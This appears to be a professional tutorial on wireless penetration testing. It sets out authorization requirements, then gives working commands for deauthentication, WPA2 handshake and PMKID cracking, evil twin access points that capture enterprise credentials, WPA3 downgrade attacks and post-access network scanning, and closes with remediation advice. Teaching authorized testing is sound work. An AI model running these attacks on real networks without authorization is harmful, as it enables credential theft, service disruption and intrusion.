Wireless Penetration Testing: Methodology, Tools, and Attack Techniques

Wireless penetration testing has specific legal requirements that differ from wired network testing.

Authorization requirements:

The Computer Fraud and Abuse Act (CFAA) and equivalents in other jurisdictions make unauthorized access to wireless networks illegal even when the network is improperly secured. Written authorization must explicitly cover:

• The specific SSIDs and BSSIDs (MAC addresses of access points) that may be tested
• The physical locations where testing may occur
• Whether deauthentication attacks are permitted (they disrupt service to legitimate users)
• Whether clients may be tested (capturing client probes, connecting to evil twins)
• Hours during which testing may occur

Hardware requirements:

Monitor mode support is non-negotiable. Built-in laptop Wi-Fi cards rarely support monitor mode or injection. Verify: iw list | grep "Supported interface modes" -A 10

Operating environment:

Kali Linux or Parrot OS are the standard platforms -- they include aircrack-ng, hcxtools, Bettercap, hostapd, and freeradius pre-installed. Use a VM with USB passthrough for the wireless adapter, or boot from a live USB for physical engagements.

Before attacking anything, build a complete picture of the wireless environment. This is entirely passive -- no transmitted packets.

Enable monitor mode:

# Check adapter name
ip link show

# Enable monitor mode (replace wlan0 with your adapter)
airmon-ng start wlan0

# Kill processes that interfere with monitor mode
airmon-ng check kill
# This creates wlan0mon (monitor mode interface)

Discover all access points and clients:

# Scan all channels (2.4GHz and 5GHz)
airodump-ng wlan0mon

# Filter to a specific BSSID and channel, save to file
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

Key information to collect per AP:

Additional recon tools:

# Kismet: more detailed passive capture with GPS support
kismet -c wlan0mon

# Wigle.net: check if target SSIDs have been publicly mapped
# hcxdumptool: next-generation capture tool
hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=3

What to look for:

• Open networks (ENC=OPN) -- direct connection, no auth required
• WEP networks -- trivially crackable in minutes
• WPA2-Personal networks with weak PSKs (dictionary attack target)
• Hidden SSIDs (still vulnerable; the SSID is visible in probe requests and association frames)
• Enterprise networks (AUTH=MGT) -- 802.1X testing scope
• Rogue APs (SSIDs matching corporate SSID but different BSSID from known AP inventory)

WPA2-Personal (PSK) networks are vulnerable to offline dictionary attacks once the handshake is captured.

Method 1: 4-way handshake capture with deauthentication

# Step 1: Start targeted capture
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# Step 2: Deauthenticate a connected client (in a second terminal)
# This forces the client to re-authenticate, generating a new handshake
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CLIENT:MAC wlan0mon
# -0 = deauth attack, 5 = number of packets, -a = AP BSSID, -c = client MAC

# Step 3: Watch airodump-ng output for "WPA handshake: AA:BB:CC:DD:EE:FF"
# Step 4: Crack with aircrack-ng
aircrack-ng handshake-01.cap -w /usr/share/wordlists/rockyou.txt

Method 2: PMKID attack (no client required)

The PMKID attack (discovered by Jens Steube, 2018) extracts a key material from the first EAPOL frame that is broadcast by the AP -- no connected client is required.

# Capture with hcxdumptool
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=3

# Convert to hashcat format
hcxpcapngtool -o pmkid.hash pmkid.pcapng

# Crack with hashcat (mode 22000 for WPA2)
hashcat -m 22000 pmkid.hash /path/to/wordlist.txt

# With rules for better coverage
hashcat -m 22000 pmkid.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Mask attack (for known PSK patterns like CompanyName + 4 digits)
hashcat -m 22000 pmkid.hash -a 3 "CompanyName?d?d?d?d"

Wordlist recommendations:

• rockyou.txt (14 million entries) -- baseline
• hashesorg251 (251 million entries) -- better coverage
• Corporate-specific wordlists: company name, city, founding year, sports teams, variations thereof

WPA2-Enterprise (802.1X) networks are NOT vulnerable to this attack -- they use per-user/per-session keys derived from RADIUS authentication, not a shared PSK.

Evil twin attacks create a fraudulent access point that mimics a legitimate network, intercepting client connections.

Basic evil twin setup with Bettercap:

# Install and start bettercap
bettercap -iface wlan0

# In bettercap console:
wifi.recon on
wifi.show

# Create evil twin (requires second adapter or AP mode support)
# First, find the target AP's channel and BSSID from wifi.show output
wifi.assoc all  # associate with target to capture details

# Set up rogue AP (in a separate terminal using hostapd)

# hostapd.conf for open evil twin (for captive portal attacks)
interface=wlan1
driver=nl80211
ssid=TargetNetworkName
hw_mode=g
channel=6
macaddr_acl=0

Evil twin for WPA2-Enterprise credential capture:

This attack targets enterprise networks with PEAP/MSCHAPv2 authentication where the client does not validate the RADIUS server certificate.

# Use hostapd-wpe (WPA2-Enterprise evil twin tool)
# It logs captured MSCHAPv2 challenge-response pairs
apt install hostapd-wpe  # Kali Linux

# hostapd-wpe.conf -- configure to match target SSID
# ssid=CorporateNetwork
# wpe_logfile=/tmp/hostapd-wpe.log

hostapd-wpe hostapd-wpe.conf

# Captured credentials appear in wpe_logfile:
# identity: domain\username
# challenge: [hex]
# response: [hex]

# Crack the MSCHAPv2 response with asleap or hashcat mode 5500
asleap -C [challenge] -R [response] -W /usr/share/wordlists/rockyou.txt
# or
hashcat -m 5500 "username:::challenge:response" wordlist.txt

When this attack works: Only when PEAP clients do not validate the RADIUS server certificate (the most common misconfiguration in enterprise wireless). Once the client is fooled into connecting to the rogue AP, it provides its MSCHAPv2 credentials in the authentication process.

Deauthentication to force client migration:

# Continuously deauthenticate from legitimate AP to force clients to connect to evil twin
aireplay-ng -0 0 -a [LEGITIMATE-AP-BSSID] wlan0mon  # 0 = continuous

WPA3-Personal (SAE/Dragonfly) eliminates offline dictionary attacks but has its own attack surface. WPA3-Enterprise improves on WPA2-Enterprise by requiring 192-bit security suite ciphers.

WPA3-Personal (SAE) characteristics:

• Replaces the 4-way handshake with the Simultaneous Authentication of Equals (SAE/Dragonfly) key exchange
• SAE provides forward secrecy -- capturing the SAE handshake does not allow offline dictionary attack
• Each connection requires an online interaction with the AP (brute-forcing requires active connections)

Known WPA3 weaknesses:

1. Dragonblood attacks (CVE-2019-9494, CVE-2019-9496): Side-channel timing attacks on SAE implementations that allow offline password recovery. Affects unpatched implementations -- check AP firmware versions. Well-patched APs have largely mitigated these.

2. WPA3 downgrade attack: If the AP supports both WPA2 and WPA3 (transition mode), an attacker can force a client to use WPA2 by running a rogue AP with only WPA2. Once the client uses WPA2, the PMKID/handshake attack applies.

# Test if target supports WPA3 transition mode
# Look for WPA3/WPA2 mixed in airodump-ng output (CIPHER: CCMP TKIP, ENC: WPA2 WPA3)
# If transition mode, force downgrade by presenting WPA2-only rogue AP

3. WPA3-Enterprise EAP downgrade: WPA3-Enterprise mandates 802.1X but the EAP method choice is still client-side negotiation. If the client accepts EAP-MD5 or EAP-GTC, the rogue AP can negotiate a weak EAP method and capture credentials.

Testing WPA3 implementations:

• Verify firmware is patched against Dragonblood (check vendor security advisories)
• Test for transition mode and downgrade susceptibility
• Validate that Protected Management Frames (PMF/802.11w) are required -- this blocks deauthentication attacks
• Check that clients enforce WPA3-only connection (not transition mode) where WPA3 is deployed

Once connected to the target network (via cracked PSK or successful credential capture), wireless pen testing transitions into standard internal network testing.

Immediate post-connection reconnaissance:

# Get DHCP lease and network information
ip addr show
ip route show

# Identify the network range and gateway
# Scan the local subnet
nmap -sn 192.168.1.0/24 -oG hosts-up.txt

# Identify active hosts with service detection
nmap -sV -sC -O --top-ports 1000 192.168.1.0/24

Wireless network segmentation test:

A critical finding is whether the wireless network is properly segmented from wired internal infrastructure:

# Can you reach domain controllers from the wireless segment?
nmap -p 389,636,3268,3269,88 [DC-IP-RANGE]

# Can you reach internal file servers?
nmap -p 445,139 192.168.0.0/16

# Attempt to reach known internal systems (from scope document)
ping -c 3 [internal-server-IP]

If the wireless network can reach internal systems without any additional authentication, this is a critical finding: the wireless network provides direct access to the internal network, and any wireless compromise is effectively an internal compromise.

Findings documentation for wireless assessments:

Each finding should include: exact attack steps reproduced, specific AP/SSID affected, business impact statement, and a remediation recommendation (for PSK cracking: migrate to WPA2-Enterprise or WPA3-SAE with strong passphrase; for PEAP: enforce certificate validation via GPO).